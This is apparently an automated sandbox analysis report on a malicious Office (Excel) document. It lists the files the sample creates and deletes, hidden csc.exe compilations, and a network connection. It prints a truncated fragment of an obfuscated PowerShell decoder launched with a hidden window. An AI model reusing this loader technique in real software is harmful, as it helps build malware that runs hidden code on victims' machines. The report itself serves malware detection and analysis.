Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function ed52bae { param($fd73c) $q847294 = 'h489d3';$e65923b = ''; for ($i = 0; $i -lt $fd73c.length; $i+=2) { $o9a2f4 = [convert]::ToByte($fd73c.Substring($i, 2), 16...
Modifies file system
Creates the following files
- %TEMP%\f-ehfboq.0.cs
- %TEMP%\res5382.tmp
- %TEMP%\csc54f8.tmp
- %TEMP%\fkcogr0g.dll
- %TEMP%\1szqlpeb.dll
- %TEMP%\ztvzf3np.dll
- %TEMP%\res5576.tmp
- %TEMP%\res54e9.tmp
- %TEMP%\csc54e8.tmp
- %TEMP%\res5372.tmp
- %TEMP%\res54f9.tmp
- %TEMP%\tjxmis8j.dll
- %TEMP%\lkdvorbw.0.cs
- %TEMP%\lkdvorbw.cmdline
- %TEMP%\lkdvorbw.out
- %TEMP%\csc8e57.tmp
- %TEMP%\res8e77.tmp
- %TEMP%\lkdvorbw.dll
- %TEMP%\f-ehfboq.dll
- %TEMP%\gbdiw8wq.dll
- %TEMP%\csc53cf.tmp
- %TEMP%\res53b1.tmp
- %TEMP%\csc53a0.tmp
- %TEMP%\f-ehfboq.out
- %TEMP%\tjxmis8j.0.cs
- %TEMP%\tjxmis8j.cmdline
- %TEMP%\tjxmis8j.out
- %TEMP%\gbdiw8wq.0.cs
- %TEMP%\gbdiw8wq.cmdline
- %TEMP%\fkcogr0g.0.cs
- %TEMP%\fkcogr0g.cmdline
- %TEMP%\f-ehfboq.cmdline
- %TEMP%\gbdiw8wq.out
- %TEMP%\ztvzf3np.cmdline
- %TEMP%\fkcogr0g.out
- %TEMP%\ztvzf3np.out
- %TEMP%\1szqlpeb.0.cs
- %TEMP%\1szqlpeb.cmdline
- %TEMP%\1szqlpeb.out
- %TEMP%\csc5361.tmp
- %TEMP%\csc5381.tmp
- %TEMP%\ztvzf3np.0.cs
- %TEMP%\package.json
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{d5e2e6ff-07d4-431d-9332-9f72224089dd}.tmp
Deletes the following files
- %TEMP%\res53b1.tmp
- %TEMP%\res54e9.tmp
- %TEMP%\csc53cf.tmp
- %TEMP%\res54f9.tmp
- %TEMP%\csc54e8.tmp
- %TEMP%\gbdiw8wq.pdb
- %TEMP%\gbdiw8wq.out
- %TEMP%\gbdiw8wq.dll
- %TEMP%\gbdiw8wq.0.cs
- %TEMP%\gbdiw8wq.cmdline
- %TEMP%\fkcogr0g.0.cs
- %TEMP%\tjxmis8j.dll
- %TEMP%\tjxmis8j.0.cs
- %TEMP%\tjxmis8j.out
- %TEMP%\tjxmis8j.cmdline
- %TEMP%\res8e77.tmp
- %TEMP%\csc8e57.tmp
- %TEMP%\lkdvorbw.out
- %TEMP%\lkdvorbw.dll
- %TEMP%\lkdvorbw.pdb
- %TEMP%\lkdvorbw.0.cs
- %TEMP%\f-ehfboq.dll
- %TEMP%\f-ehfboq.pdb
- %TEMP%\f-ehfboq.out
- %TEMP%\f-ehfboq.cmdline
- %TEMP%\f-ehfboq.0.cs
- %TEMP%\res5372.tmp
- %TEMP%\csc5361.tmp
- %TEMP%\res5382.tmp
- %TEMP%\csc5381.tmp
- %TEMP%\1szqlpeb.out
- %TEMP%\1szqlpeb.cmdline
- %TEMP%\1szqlpeb.0.cs
- %TEMP%\1szqlpeb.pdb
- %TEMP%\1szqlpeb.dll
- %TEMP%\lkdvorbw.cmdline
- %TEMP%\tjxmis8j.pdb
- %TEMP%\fkcogr0g.out
- %TEMP%\fkcogr0g.cmdline
- %TEMP%\fkcogr0g.pdb
- %TEMP%\ztvzf3np.0.cs
- %TEMP%\ztvzf3np.pdb
- %TEMP%\ztvzf3np.dll
- %TEMP%\ztvzf3np.cmdline
- %TEMP%\ztvzf3np.out
- %TEMP%\res5576.tmp
- %TEMP%\csc54f8.tmp
- %TEMP%\csc53a0.tmp
- %TEMP%\fkcogr0g.dll
- %TEMP%\package.json
Network activity
Connects to
- '35.##0.88.182':80
Miscellaneous
Creates and executes the following
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\f-ehfboq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tjxmis8j.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fkcogr0g.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gbdiw8wq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ztvzf3np.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\1szqlpeb.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5372.tmp" "%TEMP%\CSC5361.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5382.tmp" "%TEMP%\CSC5381.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES53B1.tmp" "%TEMP%\CSC53A0.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5576.tmp" "%TEMP%\CSC54F8.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES54E9.tmp" "%TEMP%\CSC53CF.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES54F9.tmp" "%TEMP%\CSC54E8.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lkdvorbw.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8E77.tmp" "%TEMP%\CSC8E57.tmp"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\f-ehfboq.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tjxmis8j.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fkcogr0g.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gbdiw8wq.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ztvzf3np.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\1szqlpeb.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5372.tmp" "%TEMP%\CSC5361.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5382.tmp" "%TEMP%\CSC5381.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES53B1.tmp" "%TEMP%\CSC53A0.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5576.tmp" "%TEMP%\CSC54F8.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES54E9.tmp" "%TEMP%\CSC53CF.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES54F9.tmp" "%TEMP%\CSC54E8.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lkdvorbw.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8E77.tmp" "%TEMP%\CSC8E57.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
